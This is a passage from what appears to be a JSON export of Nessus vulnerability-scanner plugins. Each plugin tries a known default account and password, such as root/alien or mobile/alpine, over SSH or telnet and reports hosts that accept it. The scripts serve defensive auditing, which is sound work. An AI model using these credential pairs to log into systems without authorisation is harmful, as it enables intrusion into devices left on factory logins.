script_set_attribute(attribute:\"see_also\", value:\"https://www.raspberrypi.org/downloads/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account, or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:20:28", "description": "The account 'root' on the remote host has the password '0p3nm35h'. An attacker may leverage this issue to gain total control of the affected system.\n\nNote that some network devices are known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-08-09T00:00:00", "type": "nessus", "title": "Default Password (0p3nm35h) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_0P3NM35H.NASL", "href": "https://www.tenable.com/plugins/nessus/48274", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"0p3nm35h\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48274);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (0p3nm35h) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password '0p3nm35h'. \nAn attacker may leverage this issue to gain total control of the\naffected system.\n\nNote that some network devices are known to use these credentials by\ndefault.\");\n # https://web.archive.org/web/20101029225701/http://robin-mesh.wik.is/Howto/Router_Access/SSH_Access\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d0967a9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:22:14", "description": "The account 'patrol' on the remote host has the password 'patrol'. An attacker may leverage this issue to gain access to the affected system and launch further attacks against it.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-10-31T00:00:00", "type": "nessus", "title": "Default Password (patrol) for 'patrol' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_PATROL_PATROL.NASL", "href": "https://www.tenable.com/plugins/nessus/50426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"patrol\";\npassword = \"patrol\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50426);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (patrol) for 'patrol' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'patrol' on the remote host has the password 'patrol'. \nAn attacker may leverage this issue to gain access to the affected\nsystem and launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:41:53", "description": "The account 'root' on the remote host has the password 'testpass123'.\nAn attacker may leverage this to gain total control of the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-10-15T00:00:00", "type": "nessus", "title": "Default Password (testpass123) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_TESTPASS123.NASL", "href": "https://www.tenable.com/plugins/nessus/34418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"testpass123\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34418);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (testpass123) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'testpass123'.\nAn attacker may leverage this to gain total control of the affected\nsystem.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:14:34", "description": "The account 'root' on the remote host has the password 'alien'.\nAn attacker may leverage this issue to gain access, likely as an administrator, to the affected system.\n\nNote that DD-WRT, an open source Linux-based firmware popular on small routers and embedded systems, is known to use these credentials by default.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-05-06T00:00:00", "type": "nessus", "title": "Default Password (alien) for 'root' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ALIEN.NASL", "href": "https://www.tenable.com/plugins/nessus/46240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# ref: http://securityvulns.com/Xdocument763.html\n\n\naccount = \"root\";\npassword = \"alien\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46240);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n script_bugtraq_id(39942);\n\n script_name(english:\"Default Password (alien) for 'root' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'alien'.\nAn attacker may leverage this issue to gain access, likely as an\nadministrator, to the affected system.\n\nNote that DD-WRT, an open source Linux-based firmware popular on\nsmall routers and embedded systems, is known to use these\ncredentials by default.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:03:31", "description": "The account 'admin' on the remote host has the default password 'adminIWSS85'. A remote attacker can exploit this issue to gain administrative access to the affected system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-04-07T00:00:00", "type": "nessus", "title": "Default Password 'adminIWSS85' for 'admin' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_ADMINIWSS85.NASL", "href": "https://www.tenable.com/plugins/nessus/99246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"adminIWSS85\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99246);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'adminIWSS85' for 'admin' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'adminIWSS85'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, unix:FALSE, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:08:17", "description": "The account 'swift' has the password 'swift'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-03-24T00:00:00", "type": "nessus", "title": "Default Password (swift) for 'swift' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_SWIFT_SWIFT.NASL", "href": "https://www.tenable.com/plugins/nessus/12116", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was shamelessly copied by Michel Arboi :)\n#\n# GNU Public License\n#\n\naccount = \"swift\";\npassword = \"swift\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12116);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (swift) for 'swift' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'swift' has the password 'swift'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2004-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:30:37", "description": "The account 'mobile' on the remote host has the password 'alpine'. \n\nAn attacker may leverage this issue to gain access to the affected system. \n\nNote that iPhones are known to use these credentials by default and allow access via SSH when jailbroken.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2009-11-04T00:00:00", "type": "nessus", "title": "Default Password (alpine) for 'mobile' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_MOBILE_ALPINE.NASL", "href": "https://www.tenable.com/plugins/nessus/42368", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"mobile\";\npassword = \"alpine\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42368);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (alpine) for 'mobile' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'mobile' on the remote host has the password 'alpine'. \n\nAn attacker may leverage this issue to gain access to the affected\nsystem. \n\nNote that iPhones are known to use these credentials by default and\nallow access via SSH when jailbroken.\");\n # https://arstechnica.com/gadgets/2009/11/dutch-hacker-holds-jailbroken-iphones-hostage-for-5/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a8323342\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = 